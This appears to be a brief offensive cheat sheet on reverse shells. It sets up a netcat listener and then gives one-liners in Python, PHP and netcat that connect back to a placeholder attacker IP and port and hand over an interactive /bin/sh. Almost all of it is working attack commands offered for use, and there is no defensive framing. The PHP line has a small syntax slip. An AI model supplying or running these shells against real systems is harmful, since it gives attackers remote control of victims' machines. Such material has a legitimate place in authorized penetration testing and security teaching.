Reverse shells are one of the best ways to connect back to your attacking machine via remote code execution.
First step – set up a listener on your machine using Netcat
nc -lvnp <port number>
Second step – choose your platform
Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<Your-IP>,<your port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP reverse shell
php -r '$sock=fsockopen(<Your-IP,<your port>);exec("/bin/sh -i <&3 >&3 2>&3");'
Netcat reverse shell
nc -e /bin/sh <Your-IP> <your port>